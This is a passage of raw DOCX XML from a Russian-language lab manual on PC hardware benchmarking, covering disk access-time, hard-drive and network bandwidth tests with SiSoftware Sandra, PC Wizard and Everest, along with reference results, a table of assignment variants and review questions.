        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для начала тестирования выберите размер блока равным 4Кбайт, выберите тест «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Average</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Read</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>» и нажмите кнопку «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>». За результат будем принимать среднее значение – «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Average</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>». Тестирование следует проводить не менее 15 секунд. Повторите тест с размером блока равным 1Мбайт. Определите с каким размером блока задержка больше.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эталонные результаты (среднее значение – «Average», блоки 4 Кб):</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 xml:space="preserve">Western Digital 3200YS 320Gb – 15.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мс</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</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 xml:space="preserve">Samsung 1614N 160Gb – 11 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мс</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</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 xml:space="preserve">Hitachi HTS 541616 150Gb – 12.6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мс</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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4.1.4 Тест «среднее время доступа при операции запись»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для начала тестирования выберите размер блока равным 4Кбайт, выберите тест «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Average</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>» и нажмите кнопку «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>». За результат будем принимать среднее значение – «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Average</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>». Тестирование следует проводить не менее 15 секунд. Повторите тест с размером блока равным 1Мбайт. Определите с каким размером блока задержка больше.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эталонные результаты (среднее значение – «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Average</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>», блоки 4 Кб):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Western Digital 3200YS 320Gb – 9.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мс</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Samsung 1614N 160Gb – 8.5 мс;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hitachi HTS 541616 150Gb – 9.9 мс.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Тестирование при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wizard</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для тестирования дисков во вкладке «тест» выберите «тест жесткого диска», после завершения тестирование результат можно сравнить, нажав кнопку «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Compare</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>» (рис. 21).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2425679" cy="2080800"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="5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72" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2425810" cy="2080913"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 21 -  Тестирование жесткого диска</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5 Тест «Пропускная способность сети»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест будем производить при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SiSoftware</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sandra</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000469BD" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для начала тестирования в окне программы перейдите во вкладку «Эталонные тесты» и запустите тест. В окне теста нажмите кнопку «Обновить». На рис. 22 представлено окно с результатами теста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2428950" cy="1969902"/>
            <wp:effectExtent l="19050" t="0" r="9450" b="0"/>
            <wp:docPr id="53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73" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2428987" cy="1969932"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 22 – Результаты теста «Пропускная способность сети»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="000469BD" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проделать ход работы и согласно варианту в табл. 1 выполнить тесты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 1 – Варианты задания к лабораторной работе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14"/>
        <w:gridCol w:w="5698"/>
        <w:gridCol w:w="2375"/>
      </w:tblGrid>
      <w:tr w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidTr="000469BD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1214"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Вариант</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Программа</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1</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«Чтение из памяти»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Чтение данных физического накопителя</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Sisoftware Sandra</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2</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«Запись в память»</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Быстродействие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Запись данных физического носителя</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3</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«Копирование в память»</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Среднее время доступа при операции «чтение»</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4</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«Задержка памяти»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Быстродействие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Среднее время доступа при операции «запись»</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5</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«Чтение из памяти»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Быстродействие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Тестирование жесткого диска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6</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«Запись в память»</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Быстродействие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Запись данных физического носителя</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7</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«Копирование в память»</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Быстродействие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Среднее время доступа при операции «чтение»</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8</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«Задержка памяти»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Быстродействие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Среднее время доступа при операции «запись»</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9</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«Чтение из памяти»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Быстродействие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«Чтение данных» физического носителя</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1214" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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10</w:t>
            </w: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Арифметический тест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 xml:space="preserve">Мультимедийный тест процессора </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«Производительность криптографии»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«Запись в память»</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Lavalys Everest</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Тестирование видеопамяти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Быстродействие графического процессора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Тестирование жесткого диска</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lang w:val="en-US"/>
              </w:rPr>
              <w:t>PC Wizard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidTr="000469B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918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="000469BD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5698"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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Пропускная способность сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="000469BD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sisoftware Sandra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контрольные вопросы</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Дайте определение синтетическим, полусинтетическим тестам.</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Объясните принцип арифметического тестирования процессора.</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Объясните принцип мультимедийного тестирования процессора.</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Объясните принцип теста «чтение из памяти».</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Объясните принцип теста «запись в память».</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Объясните принцип теста «копирование в память».</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Объясните принцип теста «задержка памяти».</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Объясните принцип теста «CPU AES».</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Объясните принцип тестирования видеопамяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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lastRenderedPageBreak/>
        <w:t>Объясните принцип теста «рендеринг».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задние 2. Тестирование конфигураций оборудования программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
